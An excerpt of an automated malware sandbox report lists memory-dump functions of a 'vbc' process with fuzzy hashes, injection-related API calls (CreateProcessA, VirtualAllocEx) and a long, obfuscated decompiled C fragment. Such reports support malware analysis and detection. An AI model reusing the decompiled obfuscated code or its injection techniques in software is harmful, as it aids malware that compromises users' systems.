      • Instruction ID: a6b99c594b4abb74e7c9bff3dee9d1ce57de9df68418ad586c62100e67dce151
      • Opcode Fuzzy Hash: d820be5a321a6eeea8edd622642f0645f775ad203e816a2959225a46689ae1bb
      • Instruction Fuzzy Hash: 4232F075A00218DFDB15CFA5C980E99BBB2FF49304F1580E9E609AB361DB31AE91DF50
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; no API-labelled nodes]
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e398199f0664df86d414208b93630f178926db4e9e650941da606df84ca59300
      • Instruction ID: 315a8e2177ab9b53ff587f891c6f0bc1977b7507a2802d1a5654dbec207a27c7
      • Opcode Fuzzy Hash: e398199f0664df86d414208b93630f178926db4e9e650941da606df84ca59300
      • Instruction Fuzzy Hash: C7F17E74E24229CFDB54DFA5C884BADB7B1BF88319F9481A9D909A7340DB745E84CF20
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c71cbdf520043d415a4a040a2c68e776052421a5be9236aad00b26d26893f853
      • Instruction ID: e9b5e0fdc3307d0588e50966737f352770d78a77c26dfeae6c72141a7efe8337
      • Opcode Fuzzy Hash: c71cbdf520043d415a4a040a2c68e776052421a5be9236aad00b26d26893f853
      • Instruction Fuzzy Hash: 06519575E05258CFDB19CFA6D980ACDBBF2AF89300F15D1EAD408AB225DB305A85CF11
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference CreateProcessA]
      APIs
      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E8212
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: CreateProcess
      • String ID:
      • API String ID: 963392458-0
      • Opcode ID: 5881cacea5e2a9388d41ed00a9d7ddedbc3630737c8d8b1ea01af68d2bdd31e4
      • Instruction ID: 08be38e6574a7375807feffb2339e8daaa91ca71fc82d446c33dac9c1a15857d
      • Opcode Fuzzy Hash: 5881cacea5e2a9388d41ed00a9d7ddedbc3630737c8d8b1ea01af68d2bdd31e4
      • Instruction Fuzzy Hash: 76D13670D0425ACFDB20CFA5C881BEDBBB1BF49304F0491A9E959B7280DB749A95CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference CreateProcessA]
      APIs
      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E8212
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: CreateProcess
      • String ID:
      • API String ID: 963392458-0
      • Opcode ID: e3d11c349b757d7a62a84df5aad0d61f5ba763a9324154fe4d04d8a72864979b
      • Instruction ID: 6f02a3d5a88cbc156ad45d928ac3b9f25e51635071b5aa297a8b1c79b81b7c25
      • Opcode Fuzzy Hash: e3d11c349b757d7a62a84df5aad0d61f5ba763a9324154fe4d04d8a72864979b
      • Instruction Fuzzy Hash: 31D12670D1425DCFDB20CFA5C881BEDBBB1BB49304F0091A9E959B7280DB749A95CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference VirtualAllocEx]
      APIs
      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002E8932
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 815f4d0af4fec1aed81805a9c495a5e063d94e70c30522eb1e506acbc9b97f05
      • Instruction ID: e05ab007746f4be3d069f2f2a8445890cbf5cf77e4b90f4d01666d69374d8a47
      • Opcode Fuzzy Hash: 815f4d0af4fec1aed81805a9c495a5e063d94e70c30522eb1e506acbc9b97f05
      • Instruction Fuzzy Hash: 923198B9D042489FCF00CFA9E884AEEFBB1BB59314F14A42AE814B7310D735A906CF54
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference VirtualAllocEx]
      APIs
      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002E8932
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: a58cb263e379ea35c2165f6e209bc65bfdbf4dbc434a11c9ba8ffb13db5a7bc2
      • Instruction ID: 930c59cec4d602539d99684a7c77fb4a29a4cb9bdf8bb6db5e79162aed7d8bd4
      • Opcode Fuzzy Hash: a58cb263e379ea35c2165f6e209bc65bfdbf4dbc434a11c9ba8ffb13db5a7bc2
      • Instruction Fuzzy Hash: 613187B9D042989FCF10CFAAD884AAEFBB1FB49314F10942AE914B7310D735A945CF65
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference VirtualAllocEx]
      APIs
      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002E8932
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: e83cf8bc2f2422e8c5f8ea16f6195b395ba9235c01039f485599f1681fd9eef6
      • Instruction ID: 2332389a6518e967a82af03c8dcae3bc37be15a7a06d9b7c9257abab6f74afa5
      • Opcode Fuzzy Hash: e83cf8bc2f2422e8c5f8ea16f6195b395ba9235c01039f485599f1681fd9eef6
      • Instruction Fuzzy Hash: 9511A775D10248AFCF00CFE9E880ADDBBB1BF08324F20845AE958A7261C776A956DF51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ff166172424a00a275859ecd01074ea0194092e1be3246116a304f009b8f322
      • Instruction ID: 226239febca0d31f764b4a1f8a2c62ddf3fd293a8f97a6ae8a3a948418b7c780
      • Opcode Fuzzy Hash: 2ff166172424a00a275859ecd01074ea0194092e1be3246116a304f009b8f322
      • Instruction Fuzzy Hash: EF21F375D082499FCF02CFA8D880AEEBBB1AF4A310F14806AE914B7351D3359955CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: aa711635f7928ab521bfa2439a12921921507cb6cf4d1f69e178db953341541c
      • Instruction ID: 2b18f11685dacb6985116b8ea4a0ca6b11b1b7f27118cad206339892e555d4f5
      • Opcode Fuzzy Hash: aa711635f7928ab521bfa2439a12921921507cb6cf4d1f69e178db953341541c
      • Instruction Fuzzy Hash: D3119E75E002199FCF05CFA8D840AEEBBF5EB49310F10942AE914B3350D7319A50DFA4
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: be9ef5113bec494676e93d4e000516447bcf11e187d3f23850ac8a8ffc9bc6f2
      • Instruction ID: 312c9222c4742fa0c5b1965e66b6fb1340d4dd12bdb1f57857a4045e62490eb3
      • Opcode Fuzzy Hash: be9ef5113bec494676e93d4e000516447bcf11e187d3f23850ac8a8ffc9bc6f2
      • Instruction Fuzzy Hash: DEF04F74909288EFCB02CF64C854A8CBFB0EF09301F1681DAE8449B362C2359A54DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7b21333abd2d1bd714d2d33ef410a293098f4491b5298352150a0996475b0c70
      • Instruction ID: 410d9b214dcc9e3e15d7b9d9b64a783ebc079abc32f153e67191dc07086ff6a3
      • Opcode Fuzzy Hash: 7b21333abd2d1bd714d2d33ef410a293098f4491b5298352150a0996475b0c70
      • Instruction Fuzzy Hash: 15F05E2050E3C4AFC702DBB49C606597FB59F43205B5A40DBE848CB1A3DA255E08D762
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1f64e0748ced493a99563881451752bdaaf19feec1741502f7937b9b65984048
      • Instruction ID: 86b29ea69e7534618de22c9a3d1de19bccbd734d456470ac46b35df6c0bef6ef
      • Opcode Fuzzy Hash: 1f64e0748ced493a99563881451752bdaaf19feec1741502f7937b9b65984048
      • Instruction Fuzzy Hash: A4F08270C0E3C89FC746DBB498106ADBFB8AF42205F1641EFD884D72A3D6384A59DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fab2636985d9890637c81f84a7439b715ffc0d63a5c7c7b75b25dd30785f7aff
      • Instruction ID: 5f3cb14e890f0989cc7155f0fd8aba4303fbbd7318ff137e5080285972abbf58
      • Opcode Fuzzy Hash: fab2636985d9890637c81f84a7439b715ffc0d63a5c7c7b75b25dd30785f7aff
      • Instruction Fuzzy Hash: A6F0A0B485E3889FC703CBB4A8546D97FB4AB02200F1604DBD848D72B3E6340E4DD761
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 00154b8d3eec3ffaa0eb5e7484f6b142a8eff1fea5a56e4bf79bba2af8737be1
      • Instruction ID: ca2e843f4422d04c6b977f0d92331e6fd67c0155c9d55f69fb1021dbe61ef8db
      • Opcode Fuzzy Hash: 00154b8d3eec3ffaa0eb5e7484f6b142a8eff1fea5a56e4bf79bba2af8737be1
      • Instruction Fuzzy Hash: 4EF08234409244AFC741DB60EC44E997F75EF06315F1681EAE9445B372C6305A58DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c41e37a907210f2365d0b2c996be50eda90c6eb23ee769fa6307d7c6067abda3
      • Instruction ID: e0a165945b4a8a901cfdfc96b55fa7c8d57c99ad5890f1042d79450e29c02684
      • Opcode Fuzzy Hash: c41e37a907210f2365d0b2c996be50eda90c6eb23ee769fa6307d7c6067abda3
      • Instruction Fuzzy Hash: CAF030749492849FC741DBB4DC58B587FB4EF06205F2A40EED948CB3B3D6349A48D751
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a9c87f23b8f3ebe990acb9913d1bec646b0be439e652c672ffff16a332c0c39b
      • Instruction ID: 35e3604834987e52fe717fc96f904931071a1a68131d565cd79b008f02387df3
      • Opcode Fuzzy Hash: a9c87f23b8f3ebe990acb9913d1bec646b0be439e652c672ffff16a332c0c39b
      • Instruction Fuzzy Hash: E2F0A534904208EFCB44DFA8D944A9CBBF5EB48301F1181A9E908A7360D631AE54DF40
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fa6fa6aa6baccfc3644ff4b172ef5885ae7eea1573b6918e27f5abbd716f3d37
      • Instruction ID: c176e4bd0f762dd8d72e1ba52abffb3cf2bd9bb2f495fa12fbbeb149bc15680c
      • Opcode Fuzzy Hash: fa6fa6aa6baccfc3644ff4b172ef5885ae7eea1573b6918e27f5abbd716f3d37
      • Instruction Fuzzy Hash: 5EE01A70D04208EFCB44DFA8D44069DBBF5EB44305F1181A9E904A3350DB355A95DF80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c050ebe55b06dd17cfda5f9b1a6682985d178491f11caa2c080ed34326c93e44
      • Instruction ID: b4aee04bdb8646e663ab4630efd5ba3a692ee77a49a10006d2762d711b5725a3
      • Opcode Fuzzy Hash: c050ebe55b06dd17cfda5f9b1a6682985d178491f11caa2c080ed34326c93e44
      • Instruction Fuzzy Hash: 2EE01A34904208EFCB44DFA4D84495CBBB5BB09315F118198F90427320C7319A94DB80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 72523828773456c515acbe178b50a5c9c26a482f6efeb55b8cc9023281e61aff
      • Instruction ID: da7eb2b802675d138f2a28efd5a87c9b721ed326bd960ee6a24d3667c7c81d11
      • Opcode Fuzzy Hash: 72523828773456c515acbe178b50a5c9c26a482f6efeb55b8cc9023281e61aff
      • Instruction Fuzzy Hash: 9CE04670D09208EFCB54EFF898012ADBBF4AB44305F2081EDD858A3350DB358B84DB80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 02786dd29a95d2ff48d463f983ab87303984ad247ee2df3473720ba5b020fb68
      • Instruction ID: befcc6fb4e73471477f62bb84732d46e21e9ee78e654e25e28654f49e9e156e6
      • Opcode Fuzzy Hash: 02786dd29a95d2ff48d463f983ab87303984ad247ee2df3473720ba5b020fb68
      • Instruction Fuzzy Hash: 6FE01270D08208AFCB44DFE8D840AADBBF4EB48300F1181AAA908A3310DB305A95DF80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0a5373282aec2f3197557394be39c0f436b0bfbb3edec51e314b8b20af11205b
      • Instruction ID: 2fae0d4417e85586c473964698abb3ffd773892626f7a7f98f88ecef6496b86d
      • Opcode Fuzzy Hash: 0a5373282aec2f3197557394be39c0f436b0bfbb3edec51e314b8b20af11205b
      • Instruction Fuzzy Hash: 1AE0B674904208DFC744DFA8D985A5CBBF4AB08305F2101A9E90897361EB319A84DB81
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f4a770916bbae1da26a0ee7b6f32ef60e0053165bd9c71508276b55d9f8f1379
      • Instruction ID: a05d4636d4dfb472677fa65b7b478777af5f7743942573a24dadb3546831c1db
      • Opcode Fuzzy Hash: f4a770916bbae1da26a0ee7b6f32ef60e0053165bd9c71508276b55d9f8f1379
      • Instruction Fuzzy Hash: 8CD01230A05108EFC704EBE4D94565DB3F9DB45305F2244A8A50997250DB325F44D751
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ad78c41a6dc3c2cfb22107e6f1a53b3dc0d1aee619ac341535fbeb6ad39589a
      • Instruction ID: b8697c3c5206727b0de0067ca0872a5e38c33b56fe78b2438cea4c1fc537372a
      • Opcode Fuzzy Hash: 2ad78c41a6dc3c2cfb22107e6f1a53b3dc0d1aee619ac341535fbeb6ad39589a
      • Instruction Fuzzy Hash: 5FE0EC70904208DFCB44DFA8D94475CBBB4AB04205F2101A99908A3360EB305A94DB91
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 74%
      			E003358D3(intOrPtr* __eax, intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
      				signed int _t296;
      				signed char _t304;
      				signed int _t305;
      				signed int _t310;
      				intOrPtr* _t311;
      				signed int _t313;
      				signed char _t315;
      				signed int _t317;
      				signed int _t318;
      				signed int _t319;
      				signed int _t320;
      				signed int _t321;
      				intOrPtr* _t322;
      				intOrPtr* _t323;
      				signed int _t324;
      				intOrPtr* _t325;
      				intOrPtr* _t326;
      				signed int _t329;
      				signed char _t332;
      				signed int _t333;
      				signed int _t334;
      				signed char _t337;
      				intOrPtr* _t340;
      				intOrPtr* _t341;
      				signed char _t345;
      				intOrPtr* _t348;
      				signed char _t352;
      				intOrPtr* _t353;
      				intOrPtr* _t354;
      				signed char _t357;
      				signed char _t358;
      				signed char _t359;
      				signed char _t360;
      				signed char _t361;
      				signed char _t362;
      				signed char _t363;
      				intOrPtr* _t364;
      				signed char _t366;
      				intOrPtr* _t367;
      				intOrPtr* _t368;
      				signed char _t369;
      				signed char _t370;
      				signed char _t371;
      				signed int _t373;
      				signed char _t375;
      				signed char _t376;
      				intOrPtr* _t378;
      				signed char _t379;
      				signed char _t380;
      				signed char _t381;
      				signed char _t382;
      				signed char _t383;
      				signed char _t384;
      				signed char _t385;
      				signed char _t387;
      				signed char _t388;
      				void* _t389;
      				intOrPtr* _t390;
      				intOrPtr* _t391;
      				signed char _t392;
      				signed char _t393;
      				intOrPtr* _t394;
      				intOrPtr* _t395;
      				signed char _t396;
      				signed char _t397;
      				signed char _t398;
      				intOrPtr* _t399;
      				intOrPtr* _t400;
      				intOrPtr* _t401;
      				intOrPtr* _t402;
      				intOrPtr* _t403;
      				intOrPtr* _t404;
      				intOrPtr* _t405;
      				intOrPtr* _t406;
      				intOrPtr* _t407;
      				signed char* _t408;
      				intOrPtr* _t409;
      				intOrPtr* _t410;
      				intOrPtr* _t411;
      				intOrPtr* _t412;
      				intOrPtr* _t413;
      				signed char _t414;
      				signed char _t415;
      				signed char _t416;
      				signed char _t417;
      				intOrPtr* _t418;
      				intOrPtr* _t419;
      				intOrPtr* _t420;
      				signed char _t421;
      				signed int _t423;
      				intOrPtr* _t426;
      				void* _t427;
      				intOrPtr* _t428;
      				signed int _t429;
      				signed int _t430;
      				signed int _t431;
      				signed int _t432;
      				intOrPtr* _t433;
      				intOrPtr* _t434;
      				intOrPtr* _t435;
      				intOrPtr* _t436;
      				intOrPtr* _t437;
      				intOrPtr* _t445;
      				intOrPtr* _t446;
      				void* _t447;
      				intOrPtr* _t448;
      				signed char _t449;
      				signed char _t450;
      				intOrPtr _t452;
      				intOrPtr* _t453;
      				intOrPtr* _t454;
      				intOrPtr* _t455;
      				intOrPtr* _t456;
      				signed int _t458;
      				signed int _t461;
      				signed int _t462;
      				signed int _t463;
      				signed int _t465;
      				void* _t466;
      				intOrPtr* _t468;
      				void* _t470;
      				intOrPtr* _t472;
      				void* _t473;
      				void* _t474;
      				signed int* _t480;
      				intOrPtr* _t481;
      				intOrPtr* _t482;
      				intOrPtr* _t483;
      				void* _t484;
      				intOrPtr* _t485;
      				intOrPtr* _t487;
      				signed char _t488;
      				void* _t489;
      				void* _t492;
      				intOrPtr* _t498;
      				intOrPtr* _t499;
      				void* _t500;
      				void* _t501;
      				void* _t502;
      				void* _t503;
      				void* _t504;
      				intOrPtr* _t505;
      				void* _t508;
      				intOrPtr* _t510;
      				intOrPtr* _t512;
      				void* _t516;
      				signed char _t518;
      				void* _t519;
      				void* _t520;
      				void* _t521;
      				void* _t522;
      				void* _t523;
      				void* _t524;
      				signed int* _t525;
      				void* _t527;
      				void* _t529;
      				void* _t530;
      				intOrPtr* _t533;
      				void* _t534;
      				intOrPtr* _t536;
      				intOrPtr* _t537;
      				intOrPtr* _t538;
      				void* _t539;
      				void* _t540;
      				signed int _t541;
      				signed int _t551;
      				signed int _t553;
      				signed char* _t554;
      				void* _t555;
      				intOrPtr* _t556;
      				intOrPtr* _t557;
      				intOrPtr* _t558;
      				intOrPtr* _t559;
      				intOrPtr* _t563;
      				void* _t575;
      				void* _t576;
      
      				_t540 = __esi;
      				_t489 = __edx;
      				_t536 = __eax;
      				 *0xaf16cf00 =  *0xaf16cf00 + __edx;
      				 *0xc316cf00 =  *0xc316cf00 + __edx;
      				 *0xd716cf00 =  *0xd716cf00 + __edx;
      				 *0xdb16cf00 =  *0xdb16cf00 + __edx;
      				 *0xeb16cf00 =  *0xeb16cf00 + __edx;
      				 *0xfd16cf00 =  *0xfd16cf00 + __edx;
      				 *__ebx =  *__ebx + __edx;
      				 *((intOrPtr*)(__esi + 0x17)) =  *((intOrPtr*)(__esi + 0x17)) + __ebx;
      				 *[fs:0xd16cf00] =  *[fs:0xd16cf00] + __edx;
      				 *0x1b16cf00 =  *0x1b16cf00 + __esi;
      				 *__ebx =  *__ebx + __esi;
      				ss = ss;
      				asm("les edx, [edi]");
      				asm("les edx, [edi]");
      				_t458 = __ecx - 1;
      				 *__ebx =  *__ebx + __esi;
      				_pop(ss);
      				_pop(_t426);
      				 *_t426 =  *_t426 + __esi;
      				_pop(ss);
      				 *__eax =  *__eax + __esi;
      				_t427 = _t426 + _t458;
      				_push(ss);
      				if(_t427 <= 0) {
      				}
      				_t428 = _t427 + _t458;
      				 *_t428 =  *_t428 + _t540;
      				ss = ss;
      				asm("int3");
      				 *_t428 =  *_t428 + _t540;
      				ss = ss;
      				 *0xf016cf00 =  *0xf016cf00 + _t540;
      				 *0xf516cf00 =  *0xf516cf00 + _t540;
      				 *_t428 =  *_t428 + _t540;
      				_pop(ss);
      				asm("adc al, [edx]");
      				_pop(ss);
      				_pop(ss);
      				asm("popad");
      				_t492 = _t489 +  *_t428 +  *_t428 +  *_t428;
      				_t296 = (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00);
      				_pop(ss);
      				if(_t296 >= 0) {
      					_t296 = _t296 ^  *_t296;
      				}
      				asm("les edx, [edi]");
      				asm("les edx, [edi]");
      				_t541 = _t296 ^  *_t296;
      				_pop(ss);
      				_pop(ss);
      				asm("sti");
      				 *((intOrPtr*)(_t541 + 0x17)) =  *((intOrPtr*)(_t541 + 0x17)) + _t428;
      				_pop(ss);
      				_t304 = ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00) + ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00) + ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00) + ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00);
      				ss = _t558;
      				_t551 = _t541 +  *0x2d16cf00 +  *0x4416cf00 +  *_t428 +  *_t428 +  *0x6b16cf00 +  *0x8816cf00 +  *0x9916cf00 +  *0x9e16cf00 +  *0xaf16cf00 +  *0xc216cf00;
